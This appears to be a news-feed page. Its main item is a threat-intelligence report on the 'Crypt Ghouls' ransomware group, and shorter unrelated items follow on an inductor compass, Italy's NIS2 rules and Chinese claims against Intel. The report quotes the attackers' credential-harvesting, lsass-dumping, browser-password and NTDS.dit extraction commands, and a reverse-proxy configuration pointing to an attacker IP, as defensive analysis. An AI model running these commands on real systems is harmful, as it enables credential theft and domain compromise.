The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others. As the final payload, the group used the well-known ransomware LockBit 3.0 and Babuk. We have dubbed the group “Crypt Ghouls”.

Delivery and persistence

It was only in two of the group’s attacks that we were able to determine the initial access vector. The attackers used a contractor’s login information to connect to the victim’s internal systems via a VPN. The VPN connections were established from IP addresses associated with a Russian hosting provider’s network and a contractor’s network. Nowadays attackers are increasingly gaining initial access through their targets’ contractors. We suspect that contractors are compromised via VPN services or unpatched vulnerabilities.

To maintain access to the system, the attackers used the NSSM and Localtonet utilities. NSSM creates and manages services on a host, while Localtonet provides an encrypted tunnel for connecting to that host from an external network. Both utilities were downloaded directly from localtonet.com:
hxxp://localtonet.com/nssm-2.24.zip
hxxp://localtonet.com/download/localtonet-win-64.zip

Harvesting login credentials

XenAllPasswordPro

The attackers employed the XenAllPasswordPro tool to harvest a range of authentication data from the target system.
cmd.exe /Q /c c:\programdata\allinone2023\XenAllPasswordPro.exe -a
c:\programdata\report.html 1> \Windows\Temp\LNhkey 2>&1

cmd.exe /Q /c cmd /c rmdir /q /s c:\programdata\allinone2023 1>
\Windows\Temp\HYirzI 2>&1
This utility and the path to it, “\allinone2023\”, are characteristic of this series of attacks. Following is a list of locations for XenAllPasswordPro that we have observed in various victim infrastructures.

• c:\programdata\allinone2023\xenallpasswordpro.exe
• c:\programdata\dbg\allinone2023\xenallpasswordpro.exe
• c:\programdata\1c\allinone2023\xenallpasswordpro.exe
• $user\desktop\allinone2023\xenallpasswordpro.exe
• c:\intel\xenallpasswordpro.exe

The parent process for the commands above was wmiprvse.exe. Moreover, we found an Impacket artifact in command-line output. These are signs of using the Impacket
WmiExec.py module:C:\Windows\System32\wbem\wmiprvse.exe
In one Crypt Ghouls attack, we discovered a malicious CobInt backdoor loader. This is a telltale tool that allowed us to draw parallels with other campaigns. The CobInt downloader we encountered is a VBScript called
Intellpui.vbs that executes obfuscated PowerShell code. This code, in turn, communicates with a C2 server to load the CobInt backdoor into memory.
In other cases, hackers used RDP instead of WMI.
c:\windows\system32\rdpclip.exe
c:\programdata\1c\allinone2023\xenallpasswordpro.exe -a c:\programdata\1c\2c.txt
Additionally, we noticed that in certain attacks, the
HKLM\SECURITY registry hive was being saved to a temporary folder. The hive stores the host’s security policies and the secrets managed by the Local Security Authority.C:\Windows\System32\svchost.exe -k localService -p -s RemoteRegistry

RegSaveKey("$hklm\security","$temp\kjzcehld.tmp")

Mimikatz

We detected the use of the Mimikatz utility in some of the investigated attacks. One case involved injection of malicious code from the utility into the memory of the
rundll32.exe process.
In another, a Mimikatz command was used to dump the memory of the
lsass.exe process. This holds various login details of authenticated users:sekurlsa::minidump lsass.dmp
In this way, attackers used Mimikatz to extract victims’ credentials.

dumper.ps1

Crypt Ghouls ran an open-source PowerShell script that allowed them to dump Kerberos tickets from the LSA cache. The attackers renamed it to disguise it as a Group Policy script.
.\gpo_compliance.ps1

MiniDump Tool

MiniDump Tool is a utility designed to create a memory dump of a specified process. It helped Crypt Ghouls to extract login credentials from the memory of
lsass.exe. The attackers initiated this by running the following command:T.exe [lsass_pid]
[lsass_pid]The first argument is the process ID (PID). The second argument is the file name and directory to save the dump of the selected process to.

The MiniDump Tool creates a driver at the following path:
C:\Users\[username]\AppData\Local\Temp\kxxxxxxx.sys
Next, it runs the driver and passes to it a control code to read the memory of the process whose identifier is specified as the first argument, then it saves the dump in the system, in this case — in a file in the current directory while using the process ID as its name.

Login credentials from browsers

Crypt Ghouls also copied files containing credentials stored in browsers to a temporary directory:
cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User
Data\Default\Login Data" "C:\Windows\Temp\1713909129.8364425"

cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Google\Chrome\User
Data\Default\Login Data" "C:\Windows\Temp\1713909173.8739672"

cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User
Data\Default\Login Data" "C:\Windows\Temp\1713909181.5850394"
The commands on the hosts were run via WMI.

The attackers then used PowerShell to request a list of local users:
c:\windows\system32\wbem\wmiprvse.exe >
cmd.exe /Q /c powershell.exe "Get-LocalUser | Select name" 1>
\Windows\Temp\qnLJbp 2>&1"

NTDS.dit dump

Crypt Ghouls connected to the domain controller with compromised credentials via WMI. After establishing the connection, they tried to save the
NTDS.dit dump. The attackers leveraged an existing scheduler task to obtain the dump. They modified the task four times. First, they obtained the NTDS.dit dump with the Ntdsutil utility. Then they archived the folder containing the dump and deleted the folder. The final change to the scheduler task restored its original value.powershell.exe out-file -inputobject (ntdsutil.exe 'ac i ntds' 'ifm'
'create full c:\programdata\activedirectory' q q) -encoding utf8 -
filepath c:\programdata\microsoft\vault\dabbf27c-37ef-9946-a3d3-
7aaaebce7577

powershell.exe out-file -inputobject (7zr.exe a c:\programdata\ad.7z
c:\programdata\activedirectory) -encoding utf8 -filepath
c:\programdata\microsoft\vault\4c6b60eb-eafe-ab9b-adfa-ed24b2398e0c

powershell.exe out-file -inputobject (cmd /c rmdir /q /s
c:\programdata\activedirectory) - encoding utf8 -filepath
c:\programdata\microsoft\vault\a5ad25f1-f569-6247-0722- ad6fe54e350f
The 7-Zip utility was also downloaded from GitHub:
github.com/ip7z/7zip/releases/…
However, we did not detect any further data exfiltration after the archiving.

Network reconnaissance and spread

Crypt Ghouls used the PingCastle utility (MD5: F4A84D6F1CAF0875B50135423D04139F) to collect information about the infrastructure of the domain they resided in. Additionally, the attackers periodically scanned the network using the legitimate utility SoftPerfect Network Scanner to identify open ports and network shares.

As we mentioned above, the attackers used the
WmiExec.py Impacket module for network navigation. We found that two of the targets had PAExec, a remote command tool, running on their systems at some point:c:\windows\paexec-[xxxxx]-[source_host_redacted].exe -service
cmd

Infrastructure

Crypt Ghouls uses several remote access utilities. AnyDesk was the most commonly used tool according to our research, but the attackers employed a variety of other methods as well. The table below presents the names of the utilities and the directories where they were found.

The IP addresses used for remote connections to AnyDesk and Localtonet belonged to a Surfshark VPN subnet.

Resocks is a reverse SOCKS5 proxy for tunneling traffic. While investigating this group’s activity, we found a proxy sample that was configured to use the IP address 91.142.73[.]178, which is part of the hosting provider VDSina’s network.

Below are the notable parameters of the resocks sample, which provide additional context for the research:
-X main.defaultConnectBackAddress=91.142.73[.]178 -X
main.defaultConnectionKey=CzKDvHM8UGE/QtjuF2SSkJzaVmRpjNipdWlbTzFry6o

DLL sideloading

The malicious actor used the DLL sideloading technique by placing a legitimate Windows installer management application,
dism.exe, and a malicious loader, dismcore.dll, in the same folder: c:\ProgramData\oracle\.
The
dismcore.dll loader attempted to locate the file odbcconf.xml, which contained the payload, but we were unable to retrieve that file.

File encryption

The attackers encrypted data with publicly available versions of the popular LockBit 3.0 (for Windows systems) and Babuk (for Linux) malware. The LockBit sample we analyzed was configured with commands to encrypt local drives, terminate specific processes and services, disable Windows Defender, and delete event logs. The ransomware added system directories, as well as a folder named
intel where the attackers loaded tools to harvest credentials, to the encryption exclusions list.

A snippet of the LockBit 3.0 sample’s configuration

We noticed something strange about how a victim’s files were encrypted. First, LockBit encrypted files with specific extensions, as defined in its sample configuration. These are the files that the attackers may find most valuable. Besides these, the malware encrypts files in the recycle bin while inserting random characters in these. Beyond the primary algorithm, we found a cycle that systematically renamed the original file in the recycle bin. This process iterated through every letter of the English alphabet, continuing until it reached the last one. This type of encryption makes it really hard, or even impossible, to recover the user’s files.

The file renaming cycle

Below is an example of how this appears in logs:
File Renamed c:\$recycle.bin\[redacted]\desktop.ini
c:\$recycle.bin\[redacted]\aaaaaaaaaaa
File Renamed c:\$recycle.bin\[redacted]\aaaaaaaaaaa
c:\$recycle.bin\[redacted]\bbbbbbbbbbb
File Renamed c:\$recycle.bin\[redacted]\bbbbbbbbbbb
c:\$recycle.bin\[redacted]\ccccccccccc
File Renamed c:\$recycle.bin\[redacted]\ccccccccccc
c:\$recycle.bin\[redacted]\ddddddddddd
The algorithm then attempts to delete the last version of
c:\$recycle.bin\[redacted]\zzzzzzzzzzz.

The attackers leave a ransom note with a link containing their ID in the Session messaging service for future contact:

A LockBit 3.0 ransom note

Session supports end-to-end encryption, which minimizes the risk of data breaches. The developers claim their messaging service is built to guarantee complete privacy. Session has been used by other ransomware groups, such as GhostLocker, SEXi, and MorLock, in their attacks.

Additionally, attackers targeted ESXi servers with the Babuk ransomware. They would connect to the ESXi server via SSH, upload Babuk, and initiate the encryption process for the files within the virtual machines:
/tmp/lock.out "/vmfs/volumes/[redacted]"
We believe the goal of the attackers was to disrupt the targeted organizations’ operations, besides financial gain.

Links to other groups

We are seeing a lot of overlap in the tools and techniques used by cybercriminals targeting Russian businesses and government agencies. Below, we outline the key similarities we found in attacks by different groups.

MorLock

MorLock activities, as investigated by F.A.C.C.T., shares many features with several of the attacks we analyzed for this report. The groups share most of the tools they use: SoftPerfect Network Scanner, XenAllPasswordPro, AnyDesk, PingCastle, Localtonet, NSSM, resocks, LockBit 3.0, and Babuk.

The file and folder names used in attacks by both groups also show similarities. Thus we found a resocks utility named “xfs-healthcheck”, a name that follows the same template as the resocks names on the list of indicators published by F.A.C.C.T.: [xxx]-healthcheck. We noticed a further similarity when studying the XenAllPasswordPro utility: in MorLock attacks, it was located in a directory named “allinone2023”.

Furthermore, we checked the MorLock infrastructure as reported by F.A.C.C.T., only to find that the group also used Surfshark VPN and the VDSina hosting services provider.

BlackJack

While investigating the utilities used in Crypt Ghouls attacks, we found an overlap with the toolkit employed by the BlackJack group, which also used XenAllPasswordPro. This caught our attention, as XenAllPasswordPro is not the most popular tool among cybercriminals despite being freely available.

Twelve

We have seen XenAllPasswordPro used in attacks by Twelve too. Furthermore, we discovered
Intellpui.vbs, a loader for CobInt, also used by Twelve, on one of the systems attacked by Crypt Ghouls.

Shedding Zmiy

Shedding Zmiy is a group associated with the (Ex)Cobalt activity cluster. We found a further overlap in a report by Solar 4RAYS on this group-related incidents, namely the use of DLL sideloading with the
dismcore.dll malicious loader. The report mentioned other familiar utilities and malware: resocks, SoftPerfect Network Scanner, and CobInt. In addition, Shedding Zmiy used VDSina to host its command-and-control servers.
The similarities between the groups described above led to the conclusion that these attacks overlap with the activity of Crypt Ghouls. Our analysis of cybercriminal tools and tactics suggests that different groups may be collaborating, sharing resources, or exchanging intelligence. Other vendors have found evidence of the (Ex)Cobalt cluster members participating in these groups’ activities, and our analysis confirms this. Right now, we cannot say for sure that these campaigns are connected, but we anticipate their number will increase further. We will continue to monitor activity targeting Russian organizations.

Victims

Russian government agencies as well as mining, energy, finance, and retail companies have fallen victim to the Crypt Ghouls group.

Conclusion

Crypt Ghouls is another group attacking Russia. Cybercriminals are leveraging compromised credentials, often belonging to subcontractors, and popular open-source tools. These include modified configurations of the LockBit 3.0 and Babuk ransomware, whose builders and source code are publicly available. As the number of attackers using leaked builds increases, identifying the perpetrators of threats becomes increasingly difficult. The shared toolkit used in attacks on Russia makes it challenging to pinpoint the specific hacktivist groups involved. In the attacks carried out by the Crypt Ghouls, we have identified components of infrastructure and a variety of popular tools that are also used by many other groups. This suggests that the current actors are not only sharing knowledge but also their toolkits. All of this only makes it more difficult to identify specific malicious actors behind the wave of attacks directed at Russian organizations.

Indicators of compromise

Note: Network addresses specified in this section are valid at the time of publishing, but may change over time.

SHA256:

File paths:
С:\ProgramData\oracle\dismcore.dll
odbcconf.xml – payload
C:\Users\User\Downloads\dumper.ps1 – dumper.ps1
C:\Users\User\Desktop\x86\x64\mimikatz.exe
C:\programdata\1c\allinone2023\xenallpasswordpro.exe
С:\programdata\allinone2023\xenallpasswordpro.exe
С:\programdata\dbg\allinone2023\xenallpasswordpro.exe
С:\programdata\1c\allinone2023\xenallpasswordpro.exe
$user\desktop\allinone2023\xenallpasswordpro.exe
C:\programdata\allinone2023\XenAllPasswordPro.exe
C:\Windows\Temp\nssm-2.24\win64\nssm.exe
C:\Users\[redacted]\Downloads\AnyDesk.exe
C:\Windows\Temp\localtonet.exe
C:\ProgramData\t.exe (MiniDump Tool)
C:\Users\User\AppData\Local\Temp\kxxxxxxx.sys
C:\Windows\Temp\kxxxxxxx.sys
/tmp/lock.out (Babuk)
/usr/sbin/xfs-healthcheck (resocks)
/usr/sbin/xfs-modules (resocks)
c:\programdata\intell\intellpui.vbs (CobInt)

IP addresses and URLs:
45.11.181[.]152 – netstaticpoints[.]com – CobInt C2
169.150.197[.]10 – SurfShark VPN
169.150.197[.]18 – SurfShark VPN
91.142.73[.]178 – VDSINA-NET
91.142.74[.]87 – VDSINA-NET
95.142.47[.]157 – VDSINA-NET
185.231.155[.]124 – VDSINA-NET

Utilities:
XenAllPasswordPro
PsExec
PAExec
SoftPerfect Network Scanner
Localtonet
PingCastle
Mimikatz
AnyDesk
NSSM
resocks

securelist.com/crypt-ghouls-ha…

Some inventions are so simple that it’s hard to improve them. The magnetic compass is a great example — a magnetized needle, a bit of cork, and a bowl of water are all you need to start navigating the globe. So why in the world would you want to over-complicate things with something like this Earth inductor compass? Just because it’s cool, of course.

Now, the thing with complication is that it’s often instructive. The simplicity of the magnetic compass masks the theory behind its operation to some degree and completely fails to deliver any quantitative data on the Earth’s magnetic field. [tsbrownie]’s gadget is built from a pair of electric motors, one intact and one stripped of its permanent magnet stators. The two are mounted on a 3D printed frame and coupled by a long shaft made of brass, to magnetically isolate them as much as possible. The motor is powered by a DC supply while a digital ammeter is attached to the terminals on the stator.

When the motor spins, the stator at the other end of the shaft cuts the Earth’s magnetic lines of force and generates a current, which is displayed on the ammeter. How much current is generated depends on how the assembly is oriented. In the video below, [tsbrownie] shows that the current nulls out when oriented along the east-west axis, and reaches a maximum along north-south. It’s not much current — about 35 microamps — but it’s enough to get a solid reading.

Is this a practical substitute for a magnetic compass? Perhaps not for most use cases, but a wind-powered version of this guided [Charles Lindbergh]’s Spirit of St. Louis across the Atlantic in 1927 with an error of only about 10 miles over the trip, so there’s that. Other aircraft compasses take different approaches to the problem of nulling out the magnetic field of the plane.

youtube.com/embed/5aGUOTizpqc?…

hackaday.com/2024/10/18/overco…

youtube.com/embed/ikC4PPTIxJM?…
Video istituzionale NIS2 – ACN
Dal 16 ottobre 2024 è entrata in vigore la nuova normativa italiana sulla Network and Information Security (NIS).
L’Agenzia per la cybersicurezza nazionale è l’Autorità competente per l’applicazione della NIS e punto di contatto unico, delineando un percorso graduale e sostenibile per consentire alle organizzazioni pubbliche e private di adempiere ai nuovi obblighi di legge.

Aumentano i campi di applicazione della normativa. I settori interessati diventano 18, di cui 11 altamente critici e 7 critici, coinvolgendo oltre 80 tipologie di soggetti, distinguendoli tra essenziali e importanti in relazione al livello di criticità delle attività svolte e del settore in cui operano. Quindi, maggiori obblighi per le misure di sicurezza e per la notifica degli incidenti e più potere di supervisione all’Agenzia e agli organi preposti alla risposta agli incidenti e alla gestione della crisi.

Sono previsti anche nuovi strumenti per la sicurezza informatica, come la divulgazione coordinata delle vulnerabilità, da realizzarsi attraverso la cooperazione e la condivisione delle informazioni a livello nazionale ed europeo.

Il percorso di attuazione L’adeguamento alla normativa NIS prevede un percorso sostenibile con una graduale implementazione degli obblighi.

Il primo passo, per i soggetti interessati, è quello di registrarsi al portale di ACN. C’è tempo dal 1° dicembre 2024 fino al 28 febbraio 2025 per le medie e grandi imprese e, in alcuni casi, anche per le piccole e le microimprese. Per agevolare il recepimento degli obblighi di notifica di incidente e delle misure di sicurezza, gli stessi verranno definiti in maniera progressiva e a valle delle consultazioni nell’ambito dei tavoli settoriali in seguito alle determine del Direttore Generale di ACN che saranno adottate entro il primo quadrimestre del 2025.

È prevista, inoltre, una finestra temporale di implementazione differenziata: 9 mesi per le notifiche e 18 mesi per le misure di sicurezza, decorrenti dalla data di consolidamento dell’elenco dei soggetti NIS (fine marzo 2025). Da aprile 2025 partirà quindi un percorso condiviso di rafforzamento della sicurezza informatica nazionale ed europea.

dicorinto.it/agenzia-per-la-cy…

Mercoledì 16 ottobre, la Cyber Security Association of China (CSAC) ha pubblicato un articolo sul suo account ufficiale WeChat, denunciando quattro principali rischi informatici associati ai prodotti Intel. Tra queste vulnerabilità ci sono problemi di sicurezza frequenti, una scarsa reattività alle segnalazioni degli utenti, un monitoraggio degli utenti sotto il pretesto della gestione remota e la presenza di backdoor che minacciano la sicurezza della rete.

Il CSAC ha richiamato l’attenzione su vulnerabilità note, come quelle identificate con il nome “Downfall“ nel 2022 e nel 2023, che possono essere sfruttate dagli hacker per accedere a informazioni sensibili. Ha criticato Intel per continuare a vendere prodotti nonostante la consapevolezza di tali problemi e per la sua lenta risposta ai reclami degli utenti.

Inoltre, l’associazione ha accusato Intel di aver collaborato con Hewlett-Packard e altri produttori nella creazione di una specifica tecnica IPMI (Intelligent Platform Management Interface), utilizzata per monitorare i server, ma che presenta significativi rischi per la sicurezza a causa della sua funzione di monitoraggio remoto.

La CSAC ha evidenziato che una parte significativa del fatturato annuale di Intel, che supera i 50 miliardi di dollari, proviene dal mercato cinese. Ha messo in discussione l’impegno di Intel nei confronti della Cina, accusandola di danneggiare gli interessi nazionali cinesi e ha invitato le autorità cinesi a condurre un’analisi della sicurezza dei prodotti Intel per proteggere i diritti dei consumatori.

L’articolo ha anche menzionato il “Chip and Science Act” degli Stati Uniti, sostenendo che Intel ne è il principale beneficiario e che il provvedimento ha come obiettivo quello di escludere l’industria cinese dei semiconduttori, aggravando le tensioni tra le due potenze.

Rispondendo alle critiche, un portavoce di Intel ha sottolineato l’importanza della sicurezza per l’azienda e il suo impegno a collaborare con le autorità competenti. In un contesto di crescente rivalità tecnologica tra Stati Uniti e Cina, gli analisti ritengono che la posizione del CSAC potrebbe presagire un’indagine ufficiale da parte della Cyberspace Administration of China su Intel, simile a quella condotta l’anno scorso su Micron Technology.

L'articolo Intel Accusata dalla Cina di impiantare Backdoor nei suoi prodotti e una scarsa Postura Cyber proviene da il blog della sicurezza informatica.